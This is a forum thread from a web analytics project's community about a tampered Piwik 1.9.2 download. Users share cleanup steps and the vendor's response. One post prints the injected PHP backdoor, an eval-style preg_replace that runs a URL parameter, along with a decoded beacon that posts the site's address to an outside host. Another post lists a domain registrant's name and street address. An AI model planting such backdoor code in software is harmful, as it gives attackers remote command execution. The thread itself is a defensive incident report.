ALERT!!!! SECURITY ISSUE: is infected

Posted by schnoog 

schnoog [ # ]
November 26, 2012 09:02PM
Please be aware of the newest

Thie file core/Loader.php is infected!!

elz64 [ # ]
November 26, 2012 09:22PM
The setup returns a warning about its size.


but what should we do ?
schnoog [ # ]
November 26, 2012 09:49PM
IMO: Don`t install it until a new, safe release is out.
lawtonca [ # ]
November 26, 2012 10:05PM
What if we have installed it?
Does it create anything we need to be worried about/remove?
schnoog [ # ]
November 26, 2012 10:28PM
At least delete the code which is evaled.
It seems the code opens a backdoor which allows the offender to run all allowed functions over eval().
Jeffery [ # ]
November 26, 2012 10:56PM
If you already installed:

1) Remove "piwik/core/DataTable/Filter/Megre.php". This is a general purpose uploading form and shell !!!! EDIT: It's also a shell command launcher...

2) Remove the last 6 lines from "piwik/core/Loader.php":

<?php Error_Reporting(0); 	if(isset($_GET['g']) && isset($_GET['s'])) {
    preg_replace("/(.+)/e", $_GET['g'], 'dwm');     exit;
  if (file_exists(dirname(__FILE__)."/lic.log")) exit;

Which once decoded execute the following code:

$_1="Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070725 Firefox/";
$_2=str_replace("&","%26",$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']);
if(file_exists(direname(__FILE__) ."/lic.log"))exit;
function l__0($_4,$_1,$_5,$_6)
	curl_setopt($_7,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070725 Firefox/");
	curl_setopt($_7,CURLOPT_POSTFIELDS,"reff=" .$_6);
	return $_8;

function l__1($_9,$_10,$_11=l__2)
	$_12=array("http"=> array("method"=> "POST","content"=> $_10));
	if($_11 !== l__2)
		return false;
	if($_15 === false)
		return false;
	return $_15;

$_16=l__1("","reff=".str_replace("&","%26",$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']));

if($_16 == false)
	$_16=l__0("","Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv: Gecko/20070725 Firefox/",5,str_replace("&","%26",$_SERVER['HTTP_HOST'] .$_SERVER['REQUEST_URI']));
$_17=fopen((direname(__FILE__) ."/lic.log"),"a+");
fwrite($_17,"piwik" ."\n");

This simply send to the hacker the url of the uploading form...

<EDIT> In fact it's even worst than that, the following code:
preg_replace("/(.+)/e", $_GET['g'], 'dwm');
execute the command given in the g parameter of the url

3) Try to figure out if any other files have been uploaded with the form (might be hard this error reporting seems to have been turned of)

If you want to reinstall go here: the piwik-1.9.2.tar.gz is not infected (when I'm writting, might get infected later :/) check the date field, it should be from 09-Nov-2012 08:25. /!\ the .zip version is the infected one !!! EDIT: It is probably safer to download it from piwik's github account: []

Edited 3 time(s). Last edit at 11/26/2012 11:42PM by Jeffery.
Jeffery [ # ]
November 26, 2012 11:01PM
If you want to thanks that guy, the domain name where your piwik url is send is registred by this guy:

Name: Amanda D. Clarke
Organization: Amanda D. Clarke
Address: 1142 Southern Street
City: Glen Cove
Province/state: NY
Country: US
Postal Code: 11542

(but it might be fake, I don't know the .com registration verification procedure)
SteveG [ # ]
November 26, 2012 11:41PM should be ok again. We are still checking the reason for that issue and how that "hacker" had the chance to manipulate the file on the server. Sorry for the inconvenience.
November 27, 2012 10:25AM
plz setup you're ids and ban asap any adresses trying to reach these file.

Check your file asap².

6ix IT // Le label sécurité de confiance.
kossmac [ # ]
November 27, 2012 10:59AM

we just updated our piwik installations on november 22nd through automatic web-update and were not affected by this problem.
November 27, 2012 11:01AM
Did you find HOW the malicious code have been injected in this file ?

6ix IT // Le label sécurité de confiance.
IT-Cru [ # ]
November 27, 2012 11:11AM
Automatic upgrade installation from 9th November is also clean on my piwik system.

IT-Cru - Das IT-Gewächs
Web-Entwicklung und IT-Services
SteveG [ # ]
November 27, 2012 11:18AM
Guess we did, but we are still checking the servers. I think we will publish a statement later.

Btw. The infected file was only "available" yesterday for a couple of hours. All updates done before and after that should not be affected.
November 27, 2012 11:18AM
A friend of mine upgraded the 14th, nothing in sources too .

6ix IT // Le label sécurité de confiance.
stesind [ # ]
November 27, 2012 11:25AM
Mine autoupdated seems to be clean as well. Can you say when this code came into the repos?
edvsb [ # ]
November 27, 2012 11:26AM
Download Piwik 1.9.2: 18.11.2012
Code: clean
SteveG [ # ]
November 27, 2012 11:29AM
The infected code was never in the repository. The infected zip file was placed directly on the server
elgringo [ # ]
November 27, 2012 11:41AM
Is there a way to determine the exact day and time when the download and installation was done?

Was the webupdate affected too? Or just the manual download? (Maybe it's the same file)
November 27, 2012 12:21PM
My installation is also clean, updated to 1.9.2 at Nov 10, 08:00 h CET

Wert- und Geschenkgutscheine für Ihre Kunden
zum Selbstausdrucken:
SteveG [ # ]
November 27, 2012 12:57PM
Here is the official statement: []
ewuser [ # ]
November 27, 2012 01:27PM
Thanks! Also for the quick handling of the issue.

Curious: Which wordpress plugin?
I use WP with several plugins too and I would like to know which one. To deactivate it.
(If you don't want to tell in public, a private message would be nice)
November 27, 2012 02:07PM
Please separate the Download Server from the official Website. Wordpress is known for its security flaws and this can happen again. Setup a separate server just to serve the download archives (e.g.

Was I able to help you? Then consider giving me a tip or Flattr smiling smiley |
November 27, 2012 03:02PM
I'm here to say that you obviously got pwned by so-called Russian Hackers.
Whois details says "Email:"
Well, "prostoivse" gives us "просто и все" which is stands for "it's just simple".
And "ebaka" stands for "f-cker".
Good luck.
stesind [ # ]
November 27, 2012 03:15PM
Blog, Forum and Downloads should all be separated. Downloads should be signed and the key published by a different server. MD5 hashes can be faked now. Best would be to generate the downloads from GIT repository. Suggest people to clone from your version control instead of downloading from server.
matt [ # ]
April 20, 2013 11:50AM
We have taken steps to ensure it does not happen again (certainly not that "easily"winking smiley
- we have now separated the downloads to another server at
- we setup different SSH accounts for each subdomain so that even if one subdomain is compromised it will not affect others.

Piwik founder

Piwik FAQ - Piwik Help - before posting a new topic
Stay tuned on the Piwik Blog... or start your Piwik Cloud 30 day free trial!

You may follow me on twitter & on github
vwyoda [ # ]
April 24, 2013 10:36AM
@Matt was this just an update or did it really take that long to do what you are stating has been done to help recitfy this issue?
matt [ # ]
April 24, 2013 12:16PM
stating what has been done months ago as I realized I forgot to update this post
Sorry, only registered users may post in this forum.

Click here to login

Free Forum support is provided by the Piwik Community. If you require any urgent or professional help, contact Piwik Professional Services team!